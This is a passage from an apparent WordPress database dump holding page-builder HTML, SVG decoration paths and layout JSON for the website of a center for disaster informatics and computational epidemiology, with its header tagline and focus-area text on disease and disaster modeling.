8-2.07-5,.32-10.51-2.38-14.93.57,4.42-3,10-.25,14.93-.57a21,21,0,0,0-.41-4.29,38.5,38.5,0,0,0-2.41-5.92l-.92,1.3a51.21,51.21,0,0,0-5.5-.55,2.76,2.76,0,0,0-2.16,1.12c-.33.66,0,1.7.15,2.56.22,1.54.48,3.07.72,4.6-2-.32-4-.6-6-1-.6-.12-1.12-.83-1.68-.85a8.2,8.2,0,0,1-7.45-5,8.36,8.36,0,0,0-1.19-1.93c-4.34.38-7.91.8-11.48.92-.8,0-1.6-1-2.45-1.55-2.23-1.3-4.53-2.48-6.7-3.87a11.48,11.48,0,0,1-2.06-2.26l-1.31.09-7.11,3.44c.51-1.71,1-3.16,1.39-4.61l-3.23,1c-1.26,2.74-3.89,2.28-5.58,1.44-2.47-1.24-4.46-3.43-6.66-5.22l-2.63.37c-.42.3-.85.59-1.28.88L1815,92l-1.3.24-3.86,2.42c-1.06,2.07-2.71,2.13-4.61,1.34l-2,.34c-1.4,2.37-2.54,1.9-3.54-.31l-4.15-5.71-.76-.53-1.31.27-1.31.91c-2.15,1.16-4.26,2.4-6.47,3.43-1.68.78-3.49,1.3-5.23,1.93C1782,99.51,1784.34,101,1788.06,100.5Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M1705.46,85.81a4.38,4.38,0,0,1,2.31,1.83c.48.62.57,1.54,1.16,3.35l3.73-5.94c.35,2.51.61,4.36.86,6.22l.77.24c1-1.51,2-3,3.23-4.79,2.69,1.59,6.16,2.57,7.75,4.86,1.93,2.75,3.55,3.7,6.59,2.4,1.4,2.3,2.34,5.58,5.88,2.53.35-.3,1.47.34,2.24.5a8.85,8.85,0,0,0,8.53-3.59l-4-3.33-3,3h0c-.52,1.87-1.45,2.1-2.77.67l-.67-.18c-1-.54-2.47-.86-2.81-1.66-2.73-6.37-7.81-7.43-13.86-6.49-2.44.37-4.15,0-3.55-3.09a.36.36,0,0,0-.25-.27c-4-.29-7.86,2.62-12,.33-.9-.5-2.86,0-3.82.74-2.33,1.78-4.2,1.33-6.39-.17-.93-.65-2.32-.65-3.5-1-.5,1.42-1,2.84-1.79,5.11,3.6-.5,6.59-1,9.59-1.3A24.79,24.79,0,0,1,1705.46,85.81Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M1616.21,78.62c2-2.87,4.61-3.18,6.76-.66,2.6,3.06,2.77,3,5.06-.82-1-.57-1.93-1.52-3-1.65-3.2-.39-6.44-.47-9.67-.68l-4.24,4.74C1613.32,81.87,1614.91,80.48,1616.21,78.62Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M1609,78.85c.28.23.86.08,1.31.1-1.29-1.66-2.49-4.6-3.87-4.69-2.6-.16-5.36,1.18-7.91,2.24-.64.27-.72,1.85-1.06,2.83.69-.37,1.39-.7,2.06-1.09C1604,75.56,1605,75.63,1609,78.85Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M1689.47,82.26c-2.45-1.14-4.89-2.32-7.36-3.4-.47-.2-1.11,0-1.65,0-2.38-.31-4.75-.66-7.12-1l-1.11.79,16.92,3.72C1689.25,82.37,1689.36,82.29,1689.47,82.26Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M1779.28,96.53c-3-3.4-6-1.4-9,0C1772.54,98.87,1776.37,98.87,1779.28,96.53Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M1594.13,82.33c1.61,0,3.09.11,2.72-2.21-1.14.14-2.4.66-3.4.36-2.12-.65-3.2,0-3.75,2C1591.18,82.43,1592.66,82.29,1594.13,82.33Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M533.93,38.55c1.78-.33,3.59-.56,5.33-1a4.91,4.91,0,0,0,2.4-1.38c2.58-3,3.41-3,5.28.44.31.57.66,1.12.52.89,5.77.28,10.93.33,16,.85,2.32.23,4.13.6,5.24-2.09a9.67,9.67,0,0,1,2.74-3.41c.48-.4,1.62,0,2.46,0,.06-1.14.11-2.28.22-4.4l-3.47,2.63c-.13-1.71-.22-3-.31-4.21l-2-2.13c-3.21.4-2.52,3-2.58,4.94-.06,2.22.13,4.84-2.28,5.46-3.08.79-6.62,1.46-9.56.67-3.29-.87-3.59-6.11-1.09-8.56.6-.59.84-1.54,1.41-2.19a3.94,3.94,0,0,1,2.84-1.43,49.65,49.65,0,0,0-1.49,6.3c-.08.67,1.28,2.2,1.62,2.1a4.61,4.61,0,0,0,2.82-1.94c.4-1-.58-2.52-.25-3.59.66-2.06,1.31-4.72,2.88-5.74,2.42-1.58,5.72-1.73,8.43-3,3.87-1.76,7.72-.72,11.6-.57h0c-.16-2.46,1.55-2.79,3.33-2.69,3,.16,6,.52,9,.8L607.9,11l2.8-1.25,1.3,0,0-1.26c-3.16.74-6.38,1.27-9.45,2.28-4.88,1.61-9.67,3.15-14.91,1.84a7,7,0,0,0-3.33.25c-8.14,2.16-16.26,4.42-24.41,6.56-3.71,1-7.51,1.62-11.2,2.67-2.72.77-5.24,2.36-8,2.84-3.36.58-4.53,2.07-4.5,5.41,0,1.23-1.49,3.42-2.49,3.54-2.88.32-3.1,2-3.37,4l3.69,1.58Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1069.52,43.37l6.19-1.24,1.31-.45,4-.58,4.89.68c4-1.88,4-1.87,5.69,2.55a30,30,0,0,0,1.2,2.79c3,5.86,3,5.82,9.09,4.29a3.72,3.72,0,0,1,2.5.41c3.12,1.85,6,3.88,4,8.29-.1.22.29.67.43,1l2.85-3c.73,1.58.37,2.94.81,4a30.58,30.58,0,0,0,3,4.62l2.47-2.29c-3.46.83-3.83.5-2.92-2.82a26.61,26.61,0,0,1,1.57-4.47c2.18-4.49.74-6.59-4.32-6.9a8.72,8.72,0,0,1-5.34-2.22c-4.86-5-4.74-5.09-9.11-.07-.12.14-.42.13-1.17.33a57.38,57.38,0,0,0-3.49-6.28,6.85,6.85,0,0,0-3.62-2.76,29,29,0,0,0-7.28-.17,55.42,55.42,0,0,0-6,.93c-2.17.37-4.32,1-6.51,1.12-3.65.3-7.51-.39-10.39,2.76a37.77,37.77,0,0,1,5.49-1.08A22.42,22.42,0,0,1,1069.52,43.37Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M617.44,10.24l4-.6c2.61,0,5.23,0,7.84,0,1.34,0,3.05.26,3.94-.43,2.59-2,4.75-1.78,6.83.48,1.62,1.76,2.72,1.95,4-.46,1.51-2.85,4.23-3.12,7.28-1.54a6,6,0,0,0,4.36.58c6.13-2.4,12.57-2.23,18.93-2.74,3.46-.56,7-1.81,10.21.74l4.74.62a15.85,15.85,0,0,1,2.84-.56c4.63-.14,9.26-.19,13.88-.27-1.36-.58-2.7-1.6-4.09-1.68C696,4,689.76,4.05,683.55,3.68c-9.12-.54-18.06,0-26.8,2.94-2.41.79-5,1-6-2.06-1.81.4-3.33.78-4.87,1.06-4.51.82-9,1.63-13.55,2.35-.83.13-1.74-.35-2.6-.31-5.24.23-10.47.54-15.7.83.25.56.5,1.13.74,1.7Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M493.05,53.3c1.63-.29,3.58,1.17,5.41,1.83l-4,3,5.83-.32c-.77-1.85-1.34-3.24-1.91-4.62-2.49-1.88-5-1.26-8-1.06-5.54.37-11.23-1.28-16.85-2.09l0-1.24L484,46.55a47.15,47.15,0,0,0-23.08,2.63,88.07,88.07,0,0,0,12.06,2.33C479.62,52.26,486.13,54.53,493.05,53.3Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M617.52,33.74l-2.9,2.16c4.85.88,4.8.88,4.91,5.68a45.67,45.67,0,0,0,.64,4.92c.26.28.53.56.79.85.41-.65,1.2-1.31,1.17-1.94-.11-2.44.58-3.63,3.32-3.92,2.18-.23,2.73-3.36,1.31-5.25C624.32,33,621,33.28,617.52,33.74Z\" transform=\"translate(0 0)\"\n          opacity=\"0.6\"></path>\n        <path d=\"M592,35.75c.83.74.73,2.5,1.25,4.78,1.89-.85,4.3-1.41,5.94-2.85,1-.83.64-3.09.83-4.27l3.15-3.29c-1.79,0-3.4-.16-4.42,2.16-.47,1.08-3.12,2.2-4.26,1.8-2.61-.91-4.76-1.43-7.06.56-.25.21-1.44-.91-2.25-1a7.84,7.84,0,0,0-2.46.46,45.78,45.78,0,0,0,5.58,1.79C589.46,36.1,591.3,35.16,592,35.75Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M535,51.31h4.2l4,.53,6.14.22,8.15,0c1.39-1.53,2.47-.9,3.44.5l-.07.12,2.68-.2c.05-.49.11-1,.16-1.47l-34.16-.94c.46.4.93.79,1.4,1.18Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M517.28,49.94l6.22.66,1.93.06L527.5,50l-19.06-2,1.41,1.82Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M597.32,44.41c-3.3.19-6.6.39-9.89.64-.23,0-.43.47-.64.73,2.5,2.16,7.06,1.78,11-.9C597.6,44.72,597.45,44.41,597.32,44.41Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M495.61,47.63c3.15.56,6.32,1.11,9.5,1.46.62.07,1.34-.72,2-1.11l-12.29-1.33C495.09,47,495.3,47.57,495.61,47.63Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M565,50.56c3.78-.16,7.57-.31,11.36-.5.1,0,.18-.37.28-.56C572.61,48.09,568.66,47.69,565,50.56Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1057.93,47.77c.24-1.13.47-2.26.71-3.39l-4.88,3.36,2.17.72Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M599,45.28c1.41,1,3.57.47,5.53-1.37C602.08,41.91,601,45.43,599,45.28Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1121.39,64.36l-2.2,0C1119.91,65.91,1120.64,65.94,1121.39,64.36Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M526.91,66.87l2.61.91,2.14,1.15,2,1.82,1.4-.44,2-1.44a1.48,1.48,0,0,1,.19-.57l.66-6.21a1.43,1.43,0,0,1-.16-.57l-4.71.66-1,.27-1.9,2.76c-.82-2.42-1.29-3.8-1.75-5.17l-.05-.07C524.76,61.66,526.48,64.39,526.91,66.87Z\" transform=\"translate(0 0)\"\n          opacity=\"0.6\"></path>\n        <path d=\"M699.28,46.12c3.9.2,5-.72,5.5-4.49l-.82-.25C701.9,42.43,699.31,43,699.28,46.12Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M637.78,32.05q-.85,2.46-1.7,4.92c1.48-2,3-1.49,4.48,0L642,34.88c0-.45,0-.9,0-1.35Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M18.44,71.94c-.93-2.4-3-4.37-4.54-6.54.79,2.21-6.73-1-13.9-4.05v8.19C7.73,71.3,20,76,18.44,71.94Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M227.49,59.55a14.62,14.62,0,0,1,5.39.15c3.79.67,7.5,2,11.3,2.29,7.86.56,15.75.58,23.63.85,1.79.06,3.59.2,5.36.43,2.28.29,4.53.71,6.79,1.08a25.57,25.57,0,0,1,3.07-.78c3.39-.47,6.81-.78,10.2-1.29,2.15-.33,2.83.77,3,2.6l1.31.32c5.86-3.59,12-2.37,18.3-1.54a78,78,0,0,1,15.47,4.16c2.66.92,6.07-.34,9.15-.61-.14-.18-.28-.52-.4-.51-5.7.44-11.06-.46-15.85-3.8-.08-.06-.22,0-.33,0-6.14-.46-12.22-1.2-17.88-3.9a4.73,4.73,0,0,0-2.35-.15c-4.42.5-8.83,1.16-13.27,1.57-3.8.35-6-1.15-7.51-4.46-.28-.61-1.05-1.43-1.54-1.4a2.21,2.21,0,0,0-1.5,1.47c-.38,1.81-.48,3.69-.76,6.12-2.94-.82-5.8-1.2-8.24-2.42-2.13-1.07-3.35-.79-5.11.57-1.29,1-3.9,2.11-4.71,1.52-2.88-2.1-5.68-1.35-8.74-1.16s-6-.46-9-.87c-1.75-.25-3.45-.88-5.2-1.13-5.63-.81-11.27-1.61-16.92-2.21-1.55-.16-3.18.41-4.77.64C219.93,58.68,223.34,60.44,227.49,59.55Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M107.68,50.62,109,50l1.34-.16h1.37l3.38.24,7.53.69c3.79-.37,7.58-.94,11.38-1,2.78-.09,5.59.74,8.37.6,4.39-.2,8.66-.6,12.82,1.52,1.39.71,3.31.41,5,.5,5.85.3,11.71.5,17.55.87,5.36.33,10.71.82,16.06,1.29,2,.17,4,.53,6,.67a12.84,12.84,0,0,0,2.58-.33c-3.2-.48-6.38-1.08-9.58-1.41-4-.42-8.2-.17-12.13-1-6.24-1.36-12.38-2.39-18.8-1.53a24.07,24.07,0,0,1-6.73-.53A4.51,4.51,0,0,1,152.65,49c-1.62-2-2.9-4.19-4.57-6.09a4.87,4.87,0,0,0-3.17-1.67c-.6,0-1.54,1.58-1.78,2.58-.85,3.6-2,4.58-5.7,3.95-3-.52-6.07-2.29-8.83.75-.3.32-1.29,0-2,0l-17.77,0c-2.55,0-5.1-.13-7.63.08s-4.86.75-7.29,1.15l11.69,1.71Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M360.25,69.74a19.45,19.45,0,0,0,14.27-2c.71-.37,1.78,0,2.68,0l6.27-.07,2.08-.58,1.19-.92,4.8-1.7c-1-1.37-1.64-3.69-3.93-1.23A12,12,0,0,1,385,64.85c-.33-1-.63-2-1-3a18.81,18.81,0,0,0-1.68-4.41,12,12,0,0,0-3.45-3.06c-1.13-.74-2.77-1.81-3.68-1.45s-1.92,2.22-2,3.47c-.16,3.27.3,6.5,4,8.14l-5.48,2.41L366,69.46l1.26-4.74c-4.21,3.49-8.38,3.43-12.54,2.69.26.7.53,1.4.79,2.09A18.31,18.31,0,0,1,360.25,69.74Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M348.81,67.74c2.05,1.76,4.37,1.82,6.69,1.76-.26-.69-.53-1.39-.79-2.09-1.83-.33-3.65-.78-5.48-1.14-.8-.15-1.81.75-2.73,1.16C347.29,67.52,348.32,67.32,348.81,67.74Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M398.14,57.66c-1.34,1.74-2.11,3.92-3.14,5.9l-.21.18.13.24,4.18-3.2,1.3-.76a16.63,16.63,0,0,0,1.42-3.64c.68-4.85,3.49-7,8.2-6.2.6.09,1.37-.88,2.06-1.36-.95-.27-1.94-.86-2.84-.74-3.33.45-5.75-.55-7.18-3.7a12.14,12.14,0,0,0-1.77-2.05c-2.86,6.11-7.58.56-11.51,2.26a21.74,21.74,0,0,0,5.76,3.5C400,50.22,401.48,53.3,398.14,57.66Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M18,59.82c-3.68-.16-5.72,1.74-4.66,4.33Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1345.25,39.33c.3,0,.55.88.77,1.37.58,1.23,1.13,2.47,1.69,3.7l2.78-5.82-7-6-.67.1C1342.29,35.36,1339.64,38.82,1345.25,39.33Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1348.71,56.82c1.07,2,1.79,1.74,3.33.61.7-.52,2.73-.57,3-.14,2.09,3.45,6.52,5.43,6.51,10.21a2.57,2.57,0,0,0,.77,1.48c4,4.4,9.59,5.64,14.78,7.72-2.36-2.43-1.84-7-6.08-8.1-.31-.08-.28-1.2-.54-1.77a4.87,4.87,0,0,0-1.22-2c-2.44-1.76-3.56-4.63-2.31-7.25.46-1,1.66-1.6,2.52-2.39a10.27,10.27,0,0,1,1.53,2.56c1.57,6.2,2.6,7.28,7.45,7.5l.09,5.57,1.23,0c.27-1.59.53-3.18,1-5.86,3.67,4.78,7.64,5.42,12,3.82.32-2.42.6-4.58.9-6.79l-2.77-.25c2.64-2.3,2.94-6.83,6.84-7.06-.26,2.92-.5,5.68-.78,8.8,1.51-.67,2.58-1.51,3-1.26,2.8,1.75,4.12.21,5.78-1.86,1.06-1.32,2.8-1.86,3.72.87.47,1.39,2.2,3.53,3,3.39a24.34,24.34,0,0,0,7.85-3c.78-.44.74-2.47.89-3.8s.12-2.9.17-4.35l-4.43-3.18-2.82,4.13c-2.88-.62-5.19-1.4-7.54-1.54s-5.25,1.11-7.38.33c-4-1.47-7.74-1.09-12.06.48a60.15,60.15,0,0,0-1.34-6.22,5,5,0,0,0-2-2.32,8.13,8.13,0,0,0-2.6-.63c-4.54-1.08-9-2-13.14,1.33a1.15,1.15,0,0,1-.59.32c-1,0-2.67.35-3-.14a5.71,5.71,0,0,1-.79-3.75,3,3,0,0,1,2.19-1.91c2.28,0,3.34-1.09,3-3.06s-1-4.09-3.92-3.47l1,2.41c-5.2,4-5.45,7-1.59,12.2a7.69,7.69,0,0,1,1.12,4.78,16.93,16.93,0,0,1-2,6.45c-.66-2.71-1.33-5.41-2.15-8.73a12.13,12.13,0,0,1-2,2.32c-.81.54-2,1.24-2.76,1-3.9-1.42-7.57-.73-11.24.69C1346.42,55.58,1348.18,55.86,1348.71,56.82ZM1375,55.71l3.17.95c1.82-1.8,2.31-3.65,1.13-6.07-.37-.74.35-2,.57-3,1,.58,2.29.94,3,1.79a45.93,45.93,0,0,1,3.11,5.31c-2.2,5.44-3.26,6.29-5.41,4.5l-3.89,2.24-2.7-4.92Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1429.65,59.51l3.06-1.52c.23,2.5-1.93,5,1.42,6.94l1.95-4.61,6.73,4.13,2.06-6c2.61,1.08,5.58,1.46,7.18,3.14,2.69,2.82,2.31,3.16,4.89.34a8.88,8.88,0,0,1,1.73-1.1c-.55,1.79-1,3.11-1.36,4.43l.72.38,3.19-1.9,2.57,3.17,3.38-4c2.19,1.56,3.36.64,4.3-1.57a3.45,3.45,0,0,1,2.45-1.77c.65,0,2,1.33,1.92,1.9-.14,1-1.18,1.76-1.85,2.62-.24.31-.52.58-.8.9,2.72,2.6,3.66-1,5.56-1.39l1.82,2.69c3.6-1.56,7.17-2.85,10.48-4.63,2.13-1.15,3.15-.7,4.45,1.1,1.48,2.05,3.51,3.51,7.27,3.65l-3.55-4.65a38.14,38.14,0,0,1,3.73,1.53c4.47,2.55,6.71,2,9.73-2.09a4.21,4.21,0,0,1,2.82-1.14,11.3,11.3,0,0,1,3,.6c1.52.3,3.49.1,4.44,1,.75.71.27,2.73.34,4.33a9.11,9.11,0,0,0,1.13-.48c4.42-2.68,5-2.61,8.87,1a3,3,0,0,0,5-1.65,28.62,28.62,0,0,0,.39-3.35c-1.18-.17-2.38-.28-3.54-.54-.94-.21-2.19-.33-2.69-1-2.81-3.64-7.42-3-11-4.73-.53-.25-1.77,1.16-2.76,1.63-1.19.56-2.6,1.53-3.68,1.29-4.88-1.06-6.15-.72-8.55,3.33l-5.16-.84c1.76-1.94,3.09-3.39,4.34-4.75-1.52-2.92-3.62-2.05-5-.87s-1.88,3.11-3,5.11c.11-3.16-.94-4.58-4.1-4.6-2.37,0-4.7-1.27-7.09-1.67a11.57,11.57,0,0,0-5,.06c-5.69,1.72-11.31,3.2-17.18.85a3.25,3.25,0,0,0-1.64-.14c-4.84.8-9.6,1-14.13-1.42a2.26,2.26,0,0,0-1.89-.12c-3.88,2.49-7.63,1.6-11.47-.11-.83-.37-2.19-.7-2.78-.29a4.61,4.61,0,0,1-5,.26c-1.55-.71-3.2-1.21-5.14-1.92-.25.81-.51,1.61-.76,2.42C1424.18,52.92,1427.59,55.41,1429.65,59.51Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1551.42,67.2c.56-1.29,1-2.54,1.61-3.69,1-1.93,4.37-2.72,5.42-1.28,2.92,4,7,4.8,11.86,4.8-.43-1.29-.75-2.21-1-3l5.34-4.25c2.54,2.71,4.76,5.31,7.28,7.57.67.61,2.35.44,3.42.14a5,5,0,0,0,1.9-1.28c1.89.52,3.92,1.38,4.11,1.08,1.62-2.56,5.43-3.51,5.47-7.21-2.48-.1-5.16-.84-7.4-.15-2.72.84-4.89.35-7.47-.28a38,38,0,0,0-9.55-.55c-2.6,0-5.18.76-7.78.85-3.25.12-6.57-.48-9.76,0-2.3.31-3.86.26-5.24-1.75a3.27,3.27,0,0,0-2.34-.91c-1.65,2.19-3.6,3.28-6.38,2.48-.1,0-.36.5-.55.77l1,6.9C1544.78,64.68,1547.93,65.4,1551.42,67.2Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1639.23,56.13l5,.11c2.64,6.34,6.6,11.29,14.84,10.85-.46,4.49,2,5.65,5.79,5.51,1.84-.07,3.7.16,5.55.25l1.69,4.38,1.21.06,1.76-.72c-.47-1-1-2-1.39-3-1.48-4-2.47-4.47-6.42-3.34a9.44,9.44,0,0,1-2.19.11c-.91-5.38-1.74-6.27-5-5.53-2.64.61-4-.91-3.32-3.67,1.13-4.46.57-5-4.39-5.07-2.74,0-5.27-.5-7-3.14-2.47-3.86-3.72-4.21-8.1-2.84l3.32,1.35Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1623.78,53.05c3.4-.23,6.83,0,10.11,0l2.21-3.28c-.78-.31-1.59-.93-2.34-.86-5,.43-10,1-15,1.55C1619.85,52.5,1621.42,53.22,1623.78,53.05Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1361.67,35.06c-2.1-.64-6.14,1-7,2.88C1357.09,37.24,1360.28,38.33,1361.67,35.06Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1341,50.21l1.76,2.4c1.6-.91,3.2-1.81,4.8-2.73,1.29-.74,2.32-1.54.54-2.86l-6.89,2.85h0Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1339.42,50.35l1.6-.14.21-.34-1.82-.1Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1341.23,49.87h0l-.21.34Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1341.23,49.87h0l-.21.34Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n      </svg>\n    </div>\n    <div class=\"h-section-grid-container h-navigation-padding h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"22-h25\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-213 style-local-22-h25 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-214-outer style-local-22-h26-outer\">\n            <div data-colibri-id=\"22-h26\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-3 h-px-md-3 h-px-3 v-inner-lg-3 v-inner-md-3 v-inner-3 style-214 style-local-22-h26 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-center align-self-md-center align-self-center\">\n                <!---->\n                <div data-colibri-id=\"22-h27\" class=\"h-global-transition-all h-heading style-215 style-local-22-h27 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-215 style-local-22-h27\">\n                    <!---->\n                    <!---->\n                    <h3 class=\"\">Center for Disaster Informatics &amp; Computational Epidemiology</h3>\n                  </div>\n                </div>\n                <div data-colibri-id=\"22-h28\" class=\"h-lead h-text h-text-component style-216 style-local-22-h28 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Enabling Data-Driven Disaster Assessment &amp; Planning\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"22-h29\" class=\"h-x-container style-217 style-local-22-h29 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-x-container-inner style-dynamic-22-h29-group style-217-spacing style-local-22-h29-spacing\"><span class=\"h-button__outer style-218-outer style-local-22-h30-outer d-inline-flex h-element\"><a h-use-smooth-scroll=\"true\" href=\"/about/\"  data-colibri-id=\"22-h30\" class=\"d-flex w-100 align-items-center h-button justify-content-lg-center justify-content-md-center justify-content-center style-218 style-local-22-h30 position-relative\"><!----><!----> <span>Learn More</span></a>\n                    </span>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-220-outer style-local-22-h31-outer\">\n            <div data-colibri-id=\"22-h31\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-3 h-px-md-3 h-px-3 v-inner-lg-3 v-inner-md-3 v-inner-3 style-220 style-local-22-h31 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-center align-self-md-center align-self-center\">\n                <!---->\n                <div data-colibri-id=\"22-h32\" class=\"d-block style-221 style-local-22-h32 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/02/unsplash.jpg\" class=\"wp-image-258 style-221-image style-local-22-h32-image\">\n                      <div class=\"h-image__frame h-image__frame_shadow style-221-frameImage style-local-22-h32-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','header_front_page','','inherit','closed','closed','','22-revision-v1','','','2022-02-16 18:34:57','2022-02-16 18:34:57','',22,'https://gsudice.dataconn.net/?p=398',0,'revision','',0),(402,1,'2022-02-16 18:36:34','2022-02-16 18:36:34','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Overlappable\",\"attrs\":{\"id\":\"overlappable\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"20-c31\",\"parentId\":\"20-c30\",\"partialId\":20,\"styleRef\":336,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"20-c32\",\"parentId\":\"20-c30\",\"partialId\":20,\"styleRef\":337,\"type\":\"content\"}],\"id\":\"20-c30\",\"parentId\":\"20-c2\",\"partialId\":20,\"styleRef\":335,\"type\":\"content\"},{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"20-c28\",\"parentId\":\"20-c26\",\"partialId\":20,\"children\":[{\"name\":\"hop-heading\",\"slot\":null,\"parentId\":\"20-c28\",\"index\":0,\"id\":\"20-c29\",\"partialId\":20,\"styleRef\":334,\"type\":\"content\",\"props\":{\"content\":\"Focus Areas<br>\"}}],\"styleRef\":333,\"type\":\"content\"}],\"id\":\"20-c26\",\"parentId\":\"20-c2\",\"partialId\":20,\"styleRef\":331,\"type\":\"content\"},{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"20-c4\",\"parentId\":\"20-c3\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c4\",\"index\":0,\"id\":\"20-c5\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/server\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c4\",\"index\":1,\"id\":\"20-c6\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"disease &amp; disaster modeling<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c4\",\"index\":1,\"id\":\"20-c7\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Develop data-driven, computational solutions to address challenges posed by disaster and disease risk assessment, forecasting, and mitigation, including issues aimed at assessing and reducing structural disparities<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"20-c8\",\"parentId\":\"20-c3\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c8\",\"index\":0,\"id\":\"20-c9\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/database\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c8\",\"index\":1,\"id\":\"20-c10\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"data as a 